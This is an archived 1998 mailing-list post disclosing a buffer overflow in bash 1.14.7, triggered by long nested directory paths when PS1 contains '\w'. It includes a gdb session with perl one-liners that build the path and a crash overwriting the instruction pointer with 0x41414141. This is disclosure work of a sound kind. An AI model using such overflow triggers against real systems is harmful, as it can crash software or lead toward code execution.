Buffer overflow in bash 1.14.7(1)

From: Joao Manuel Carolino (rootat_private)
Date: Fri Sep 04 1998 - 09:09:28 PDT

Next message: Mike Dion: "Re: IE can read local files"

Previous message: Georgi Guninski: "IE can read local files"
Next in thread: //Stany: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: //Stany: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Michael Riepe: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Wichert Akkerman: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Chet Ramey: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Fiji: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Razvan Dragomirescu: "Re: Buffer overflow in bash 1.14.7(1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

If you cd in to a directory which has a path name larger than 1024 bytes
and you have '\w' included in your PS1 environment variable (which makes
the path to the current working directory appear in each command line
prompt), a buffer overflow will occur.
The following was tested on my machine, running Slackware 3.5:

einstein:~# gdb bash
[...]
(gdb) r
Starting program: /bin/bash
bash# PS1='\w '
~ cd /tmp
/tmp mkdir `perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x
255'`
/tmp cd
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x804ed72 in sigprocmask ()
(gdb) backtrace
#0  0x804ed72 in sigprocmask ()
#1  0xe9 in ?? ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.

                                        Regards,
                                                Joao

Next message: Mike Dion: "Re: IE can read local files"
Previous message: Georgi Guninski: "IE can read local files"
Next in thread: //Stany: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: //Stany: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Michael Riepe: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Wichert Akkerman: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Chet Ramey: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Fiji: "Re: Buffer overflow in bash 1.14.7(1)"
Reply: Razvan Dragomirescu: "Re: Buffer overflow in bash 1.14.7(1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:15:00 PDT